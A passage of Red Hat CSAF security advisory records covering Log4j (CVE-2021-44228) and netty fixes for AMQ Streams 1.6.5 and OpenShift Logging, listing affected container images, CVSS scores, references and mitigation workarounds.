"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:70aca191fa4fe95e857f8cba3925d88e9965e8c868c6362e00ad0ce912360a99_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:76573c99dcd3f44e6bc81b018867ee3bfe3c33ea1878c63675a39e85b4c72de5_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-operator-bundle@sha256:862602f0b5cf3dc1bdd69f236d09a4bf1630fdd77e7faf30a1f4858558360202_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:09eb62fb9c67251f67cf13bbd840c274d879285cb3151e4540df5c9e286debff_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:551c671792f1d97cf00b1c52b8645d6aa734655bc834f280013408e2d6101b81_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:c57ce065696844f5c5d0e09969d228f79423b2d1d2f97a5a539c87fb3de63793_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:0807527589e608dec6aa6f94cccac8cf89331a86cdb193139f88c375604c9afe_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:2467fb3d733e318b3ce1474301361af0247580b7abf9b8b2d3482707d0272949_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:5e9ed1c4e59daccc7ed0a3418900f8088f8307016311b670e7d23be304b61f36_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:315b9b9057b2893d0e14fe7c3e2809066ce90b5b42863934de93734ee26d212c_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:711054937975c1e7061381bdcadd90ca8192648624888b6ba999dbedf616f8ed_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:fca86030c0886e0c41d4000d4907e6a58717b95c206d34dba5197d44aa8d6d02_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:b85c8866c068409bee0b7f162e3a5f04c075c221d04bc7f6347ca3f9e022840a_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:c47fda436df07eaab5a3878c37c43b6ce401c216f5207a6d9b2d1017d5ad1a62_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:cb3c3b89d3969a1ffe6b11b343cda4c074f3f87572dfc2b6b4d681802b4c420c_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:623dd6d9c57ed7c44e57f5f7ddfbc5b16dc986b86a20188781ebefdde9f87f0d_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:760f9ed42e7634fc246fc638985802d84df561d87c80628ba7bf7db8543e0007_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:8a21d9ea3bcc997ddaa38cf7115b8ad982d9e019beece3dd52a027aeaf211c3e_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:2d9f4a1319755cdfdf5e1cf8bd7a12edc6e17b5a85fef5f10a067e5a936a095b_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:b3cdddf65666934636aa6a6a7cf3c9f00d4f793cfb0b9eef8e0aacf04b6fb7c0_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:f68496878ed86375e0d28d4b01d1686e1af078582710576fcb8a1a4b7c6ec20f_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-operator-bundle@sha256:9ff35e6d560796a50b470c75ba6862cc79c6d9e30074e4a3f2c606fae3722956_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:64a4376815864ae9b521396b510a0d1627665142b14cd3c2e3aa9452231a542e_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:70aca191fa4fe95e857f8cba3925d88e9965e8c868c6362e00ad0ce912360a99_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:76573c99dcd3f44e6bc81b018867ee3bfe3c33ea1878c63675a39e85b4c72de5_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-operator-bundle@sha256:862602f0b5cf3dc1bdd69f236d09a4bf1630fdd77e7faf30a1f4858558360202_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:09eb62fb9c67251f67cf13bbd840c274d879285cb3151e4540df5c9e286debff_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:551c671792f1d97cf00b1c52b8645d6aa734655bc834f280013408e2d6101b81_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:c57ce065696844f5c5d0e09969d228f79423b2d1d2f97a5a539c87fb3de63793_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:0807527589e608dec6aa6f94cccac8cf89331a86cdb193139f88c375604c9afe_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:2467fb3d733e318b3ce1474301361af0247580b7abf9b8b2d3482707d0272949_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:5e9ed1c4e59daccc7ed0a3418900f8088f8307016311b670e7d23be304b61f36_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:315b9b9057b2893d0e14fe7c3e2809066ce90b5b42863934de93734ee26d212c_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:711054937975c1e7061381bdcadd90ca8192648624888b6ba999dbedf616f8ed_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:fca86030c0886e0c41d4000d4907e6a58717b95c206d34dba5197d44aa8d6d02_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:b85c8866c068409bee0b7f162e3a5f04c075c221d04bc7f6347ca3f9e022840a_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:c47fda436df07eaab5a3878c37c43b6ce401c216f5207a6d9b2d1017d5ad1a62_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:cb3c3b89d3969a1ffe6b11b343cda4c074f3f87572dfc2b6b4d681802b4c420c_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:623dd6d9c57ed7c44e57f5f7ddfbc5b16dc986b86a20188781ebefdde9f87f0d_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:760f9ed42e7634fc246fc638985802d84df561d87c80628ba7bf7db8543e0007_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:8a21d9ea3bcc997ddaa38cf7115b8ad982d9e019beece3dd52a027aeaf211c3e_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:2d9f4a1319755cdfdf5e1cf8bd7a12edc6e17b5a85fef5f10a067e5a936a095b_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:b3cdddf65666934636aa6a6a7cf3c9f00d4f793cfb0b9eef8e0aacf04b6fb7c0_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:f68496878ed86375e0d28d4b01d1686e1af078582710576fcb8a1a4b7c6ec20f_amd64"
]
}
],
"threats": [
{
"category": "exploit_status",
"date": "2023-05-01T00:00:00+00:00",
"details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"category": "impact",
"details": "Moderate"
}
],
"title": "log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)"
}
]
}
rhsa-2021_5133
Vulnerability from csaf_redhat
Published
2021-12-14 21:13
Modified
2024-12-12 01:18
Summary
Red Hat Security Advisory: Red Hat AMQ Streams 1.6.5 release and security update
Notes
Topic
Red Hat AMQ Streams 1.6.5 is now available from the Red Hat Customer Portal.
Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
Red Hat AMQ Streams, based on the Apache Kafka project, offers a distributed backbone that allows microservices and other applications to share data with extremely high throughput and extremely low latency.
This release of Red Hat AMQ Streams 1.6.5 serves as a replacement for Red Hat AMQ Streams 1.6.4, and includes security and bug fixes, and enhancements. For further information, refer to the release notes linked to in the References section.
Security Fix(es):
* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)
For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Critical"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat AMQ Streams 1.6.5 is now available from the Red Hat Customer Portal.\n\nRed Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat AMQ Streams, based on the Apache Kafka project, offers a distributed backbone that allows microservices and other applications to share data with extremely high throughput and extremely low latency. \n\nThis release of Red Hat AMQ Streams 1.6.5 serves as a replacement for Red Hat AMQ Streams 1.6.4, and includes security and bug fixes, and enhancements. For further information, refer to the release notes linked to in the References section.\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2021:5133",
"url": "https://access.redhat.com/errata/RHSA-2021:5133"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#critical",
"url": "https://access.redhat.com/security/updates/classification/#critical"
},
{
"category": "external",
"summary": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions\u0026product=jboss.amq.streams\u0026version=1.6.5",
"url": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions\u0026product=jboss.amq.streams\u0026version=1.6.5"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009"
},
{
"category": "external",
"summary": "2030932",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_5133.json"
}
],
"title": "Red Hat Security Advisory: Red Hat AMQ Streams 1.6.5 release and security update",
"tracking": {
"current_release_date": "2024-12-12T01:18:45+00:00",
"generator": {
"date": "2024-12-12T01:18:45+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.3"
}
},
"id": "RHSA-2021:5133",
"initial_release_date": "2021-12-14T21:13:26+00:00",
"revision_history": [
{
"date": "2021-12-14T21:13:26+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2021-12-14T21:13:26+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-12-12T01:18:45+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat AMQ Streams 1.6.5",
"product": {
"name": "Red Hat AMQ Streams 1.6.5",
"product_id": "Red Hat AMQ Streams 1.6.5",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:amq_streams:1"
}
}
}
],
"category": "product_family",
"name": "Red Hat JBoss AMQ"
}
],
"category": "vendor",
"name": "Red Hat"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2021-44228",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"discovery_date": "2021-12-10T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2030932"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.15.0. A remote attacker who can control log messages or log message parameters, can execute arbitrary code on the server via JNDI LDAP endpoint.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This issue only affects log4j versions between 2.0 and 2.14.1. In order to exploit this flaw you need:\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n\nIn Red Hat OpenShift Logging the vulnerable log4j library is shipped in the Elasticsearch components. Because Elasticsearch is not susceptible to remote code execution with this vulnerability due to use of the Java Security Manager and because access to these components is limited, the impact by this vulnerability is reduced to Moderate.\n\nAs per upstream applications using Log4j 1.x may be impacted by this flaw if their configuration uses JNDI. However, the risk is much lower. This flaw in Log4j 1.x is tracked via https://access.redhat.com/security/cve/CVE-2021-4104 and has been rated as having Moderate security impact.\n\nCodeReady Studio version 12.21.1 was released containing a fix for this vulnerability.\n\nThe following products are NOT affected by this flaw and have been explicitly listed here for the benefit of our customers.\n- Red Hat Enterprise Linux\n- Red Hat Advanced Cluster Management for Kubernetes \n- Red Hat Advanced Cluster Security for Kubernetes\n- Red Hat Ansible Automation Platform (Engine and Tower)\n- Red Hat Certificate System\n- Red Hat Directory Server\n- Red Hat Identity Management\n- Red Hat CloudForms \n- Red Hat Update Infrastructure\n- Red Hat Satellite\n- Red Hat Ceph Storage\n- Red Hat Gluster Storage\n- Red Hat OpenShift Data Foundation\n- Red Hat OpenStack Platform\n- Red Hat Virtualization\n- Red Hat Single Sign-On\n- Red Hat 3scale API Management",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AMQ Streams 1.6.5"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-44228"
},
{
"category": "external",
"summary": "RHBZ#2030932",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932"
},
{
"category": "external",
"summary": "RHSB-2021-009",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-44228",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-44228"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228"
},
{
"category": "external",
"summary": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q",
"url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q"
},
{
"category": "external",
"summary": "https://logging.apache.org/log4j/2.x/security.html",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"category": "external",
"summary": "https://www.lunasec.io/docs/blog/log4j-zero-day/",
"url": "https://www.lunasec.io/docs/blog/log4j-zero-day/"
},
{
"category": "external",
"summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
}
],
"release_date": "2021-12-10T02:01:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:13:26+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nThe References section of this erratum contains a download link (you must log in to download the update).",
"product_ids": [
"Red Hat AMQ Streams 1.6.5"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5133"
},
{
"category": "workaround",
"details": "For Log4j versions \u003e=2.10\nset the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true\n\nFor Log4j versions \u003e=2.7 and \u003c=2.14.1\nall PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m\n\nFor Log4j versions \u003e=2.0-beta9 and \u003c=2.10.0\nremove the JndiLookup class from the classpath. For example: \n```\nzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\n```\n\nOn OpenShift 4 and in OpenShift Logging, the above mitigation can be applied by following the steps in this article: https://access.redhat.com/solutions/6578421\n\nOn OpenShift 3.11, mitigation to the affected Elasticsearch component can be applied by following the steps in this article: https://access.redhat.com/solutions/6578441",
"product_ids": [
"Red Hat AMQ Streams 1.6.5"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat AMQ Streams 1.6.5"
]
}
],
"threats": [
{
"category": "exploit_status",
"date": "2021-12-10T00:00:00+00:00",
"details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"category": "impact",
"details": "Critical"
}
],
"title": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value"
}
]
}
rhsa-2021_5127
Vulnerability from csaf_redhat
Published
2021-12-14 18:38
Modified
2024-12-12 01:17
Summary
Red Hat Security Advisory: Openshift Logging security and bug update (5.2.4)
Notes
Topic
An update is now available for OpenShift Logging 5.2.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
Openshift Logging Security and Bug Fix Release (5.2.4)
Security Fix(es):
* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)
* netty: Request smuggling via content-length header (CVE-2021-21409)
* netty-codec: Bzip2Decoder doesn't allow setting size restrictions for decompressed data (CVE-2021-37136)
* netty-codec: SnappyFrameDecoder doesn't restrict chunk length and may buffer skippable chunks in an unnecessary way (CVE-2021-37137)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update is now available for OpenShift Logging 5.2.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Openshift Logging Security and Bug Fix Release (5.2.4)\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)\n\n* netty: Request smuggling via content-length header (CVE-2021-21409)\n\n* netty-codec: Bzip2Decoder doesn\u0027t allow setting size restrictions for decompressed data (CVE-2021-37136)\n\n* netty-codec: SnappyFrameDecoder doesn\u0027t restrict chunk length and may buffer skippable chunks in an unnecessary way (CVE-2021-37137)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2021:5127",
"url": "https://access.redhat.com/errata/RHSA-2021:5127"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#moderate",
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009"
},
{
"category": "external",
"summary": "1944888",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1944888"
},
{
"category": "external",
"summary": "2004133",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2004133"
},
{
"category": "external",
"summary": "2004135",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2004135"
},
{
"category": "external",
"summary": "2030932",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932"
},
{
"category": "external",
"summary": "LOG-1775",
"url": "https://issues.redhat.com/browse/LOG-1775"
},
{
"category": "external",
"summary": "LOG-1824",
"url": "https://issues.redhat.com/browse/LOG-1824"
},
{
"category": "external",
"summary": "LOG-1963",
"url": "https://issues.redhat.com/browse/LOG-1963"
},
{
"category": "external",
"summary": "LOG-1970",
"url": "https://issues.redhat.com/browse/LOG-1970"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_5127.json"
}
],
"title": "Red Hat Security Advisory: Openshift Logging security and bug update (5.2.4)",
"tracking": {
"current_release_date": "2024-12-12T01:17:39+00:00",
"generator": {
"date": "2024-12-12T01:17:39+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.3"
}
},
"id": "RHSA-2021:5127",
"initial_release_date": "2021-12-14T18:38:45+00:00",
"revision_history": [
{
"date": "2021-12-14T18:38:45+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2021-12-14T18:38:45+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-12-12T01:17:39+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "OpenShift Logging 5.2",
"product": {
"name": "OpenShift Logging 5.2",
"product_id": "8Base-OSE-LOGGING-5.2",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:logging:5.2::el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Enterprise"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-logging/cluster-logging-rhel8-operator@sha256:82cbec57284b21e914fad6fe3ea8244932a735da4aca2a9c74ced7689767c0b2_s390x",
"product": {
"name": "openshift-logging/cluster-logging-rhel8-operator@sha256:82cbec57284b21e914fad6fe3ea8244932a735da4aca2a9c74ced7689767c0b2_s390x",
"product_id": "openshift-logging/cluster-logging-rhel8-operator@sha256:82cbec57284b21e914fad6fe3ea8244932a735da4aca2a9c74ced7689767c0b2_s390x",
"product_identification_helper": {
"purl": "pkg:oci/cluster-logging-rhel8-operator@sha256:82cbec57284b21e914fad6fe3ea8244932a735da4aca2a9c74ced7689767c0b2?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/cluster-logging-rhel8-operator\u0026tag=v5.2.4-4"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch-rhel8-operator@sha256:ef2c1f7249a377b940bbdd2d52e2ab53ed6283f4e4d1290da6bb3edbb2109294_s390x",
"product": {
"name": "openshift-logging/elasticsearch-rhel8-operator@sha256:ef2c1f7249a377b940bbdd2d52e2ab53ed6283f4e4d1290da6bb3edbb2109294_s390x",
"product_id": "openshift-logging/elasticsearch-rhel8-operator@sha256:ef2c1f7249a377b940bbdd2d52e2ab53ed6283f4e4d1290da6bb3edbb2109294_s390x",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch-rhel8-operator@sha256:ef2c1f7249a377b940bbdd2d52e2ab53ed6283f4e4d1290da6bb3edbb2109294?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-rhel8-operator\u0026tag=v5.2.4-4"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:887c26a6c4356b64c9802fb3b870f79eb98a8f0f2ad1b2bbebd086c936c68fe5_s390x",
"product": {
"name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:887c26a6c4356b64c9802fb3b870f79eb98a8f0f2ad1b2bbebd086c936c68fe5_s390x",
"product_id": "openshift-logging/elasticsearch-proxy-rhel8@sha256:887c26a6c4356b64c9802fb3b870f79eb98a8f0f2ad1b2bbebd086c936c68fe5_s390x",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch-proxy-rhel8@sha256:887c26a6c4356b64c9802fb3b870f79eb98a8f0f2ad1b2bbebd086c936c68fe5?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-proxy-rhel8\u0026tag=v1.0.0-67"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/log-file-metric-exporter-rhel8@sha256:67e23735a1005bb7f06d3f05677bfe8c38bccc5bfc1cc4cf16832ddeda29931a_s390x",
"product": {
"name": "openshift-logging/log-file-metric-exporter-rhel8@sha256:67e23735a1005bb7f06d3f05677bfe8c38bccc5bfc1cc4cf16832ddeda29931a_s390x",
"product_id": "openshift-logging/log-file-metric-exporter-rhel8@sha256:67e23735a1005bb7f06d3f05677bfe8c38bccc5bfc1cc4cf16832ddeda29931a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/log-file-metric-exporter-rhel8@sha256:67e23735a1005bb7f06d3f05677bfe8c38bccc5bfc1cc4cf16832ddeda29931a?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/log-file-metric-exporter-rhel8\u0026tag=v1.0.0-44"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/logging-curator5-rhel8@sha256:66e46f68e5313e4f58cfd3b6fccb8edeb97a574210bff799d0bd5471b73f9f62_s390x",
"product": {
"name": "openshift-logging/logging-curator5-rhel8@sha256:66e46f68e5313e4f58cfd3b6fccb8edeb97a574210bff799d0bd5471b73f9f62_s390x",
"product_id": "openshift-logging/logging-curator5-rhel8@sha256:66e46f68e5313e4f58cfd3b6fccb8edeb97a574210bff799d0bd5471b73f9f62_s390x",
"product_identification_helper": {
"purl": "pkg:oci/logging-curator5-rhel8@sha256:66e46f68e5313e4f58cfd3b6fccb8edeb97a574210bff799d0bd5471b73f9f62?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/logging-curator5-rhel8\u0026tag=v5.8.1-47"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch6-rhel8@sha256:c8a03e59904b96bac438e2607094dff1e652c7c42ddbba31006f7760cf17b9d8_s390x",
"product": {
"name": "openshift-logging/elasticsearch6-rhel8@sha256:c8a03e59904b96bac438e2607094dff1e652c7c42ddbba31006f7760cf17b9d8_s390x",
"product_id": "openshift-logging/elasticsearch6-rhel8@sha256:c8a03e59904b96bac438e2607094dff1e652c7c42ddbba31006f7760cf17b9d8_s390x",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch6-rhel8@sha256:c8a03e59904b96bac438e2607094dff1e652c7c42ddbba31006f7760cf17b9d8?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch6-rhel8\u0026tag=v6.8.1-66"
}
}
},
{
"category": "product_version",
